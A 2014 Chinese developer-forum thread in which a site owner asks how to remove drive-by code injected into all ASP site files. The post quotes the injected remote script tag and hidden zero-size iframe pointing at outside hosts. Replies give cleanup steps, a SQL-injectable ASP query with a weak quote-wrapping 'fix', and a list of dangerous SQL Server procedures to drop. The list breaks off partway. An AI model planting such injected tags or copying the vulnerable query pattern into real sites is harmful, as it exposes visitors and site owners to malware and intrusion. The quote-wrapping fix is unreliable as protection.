日期:2014-05-17  浏览次数:21089 次

ASP网页被人插了代码。而且是所有的页面都有,谁能提供解决办法,给100分,大家帮帮忙
ASP网页被人插了代码。而且是所有的页面都有,谁能提供解决办法,给100分,大家帮帮忙
找不出问题。所有的页面都被插入了代码,除了图片外。
被插入代码的文件有*.js   ,   *.asp,   *.css   ,   *.html等


就是这段代码
<script   type= "text/javascript "   src= "http://www.mitaodd.com/ceshi/ok.js "> </script>
<iframe   src=http://www1.89382.cn/51.htm   width=0   height=0> </iframe>
哎。找不到是原因他们是怎么来插入代码的。
哎各位CSDN的朋友,XDJM,帮帮忙。马上就要过年了。再这样下去,
网站没办法经营了。帮帮忙,看看有没有人遇到这样的情况
,有类似的经验啊?小弟在这边先跪求了。

------解决方案--------------------
第一,检查网站漏洞,并加以防范
第二,设置SQL权限
第三,服务器权限设置

如有需要可以找我QQ:25050019 [有偿帮忙]

------解决方案--------------------
一般来说是有人用这台服务器上了不应该上的网就容易被加上这些东西,楼主可以用dw中的成批删除,把这些代码全去掉。完了把干净的程序复制一份放到别的机器上。留着以后中招后用。这样网站就可以正常运行了。然后楼主再看一下服务器上有什么漏洞吧
------解决方案--------------------
估计有文件 上传漏洞
------解决方案--------------------
Advanced Find and Replace和TexRep都可以,前者功能强,后者简单易用
------解决方案--------------------
被批量挂马了,建议先用dw里的批量替换把所有这些代码删除掉,然后暂时去掉上传的功能,更换后台地址。
------解决方案--------------------
做过传奇私服的人都知道有一个文本批量查找修改功能,
可以很方便地查找替换整个目录下文件里的字符串,很好用。
------解决方案--------------------
服务器一定要安杀毒软件哦,而且要加强目录的权限管理。。。。。楼主多找些服务器安全类的文章看下吧
------解决方案--------------------
这问题我遇见过。也在这里发过求救,最后总结是:
这总情况没有什么软件可以帮你修复,必须靠自己一个文件一个文件的是检查,看是不是程序上有漏动,决大多数是程序有漏动。
比如: 在ASP里有这个一段话,
<%
ID=request( "ID ")
rs.open "select * from tmptabel where id= " & ID
%>
以上这句话非常容易成为入侵者下手的地方,必须加固一下
<%
ID=request( "ID ") 要设法检查这个值,如不是数值就停用它,
rs.open "select * from tmptabel where id= ' " & ID & " ' " 把这个值有单引号括上
%>
在检查过所有文件确定程序里没有这类SQL写法的漏洞后。接下来就要全部替换掉所有页面里的非法插入的 <script type= "text/javascript " src= "http://www.mitaodd.com/ceshi/ok.js "> </script>
<iframe src=http://www1.89382.cn/51.htm width=0 height=0> </iframe>
这个东东,(可以用Macromedia Dreamweaver这类软件对网站文件进行检查),或将内部的网站把服务器上的全部复盖,确定全部删除后,接下来就该在网站内仔细查看有没有不是你的文件夹或文件,删除它,不能留情,这一部是很重要的(包括隐藏文件)。再就检查服务器内有没有可疑的执行文件,一般都在根目录下,最好都看看,有就删别留情。
最后是屏闭掉SQL的一个危险存储过程,如:
/*********************************************************************
以下列出的都是危险的内置存储过程,全在我们封杀之列
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
Xp_regwrite

sp_OAcreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop

sp_makewebtask


/*********************************************************************
以下为屏蔽上面所说的危险内置存储过程
sp_dropextendedproc 'xp_cmdshell '
go
sp_dropextendedproc 'xp_regaddmultistring '
go
sp_dropextendedproc 'xp_regdeletekey '
go
sp_dropextendedproc 'xp_regdeletevalue '
go
sp_dropextendedproc 'xp_regenumkeys '
go
sp_dropextendedproc 'xp_regenumvalues '
go
sp_dropextendedproc 'xp_regread '
go
sp_dropextendedproc 'xp_regremovemultistring '
go
sp_dropextendedproc 'xp_regwrite '
go
sp_dropextendedproc 'sp_OACreate '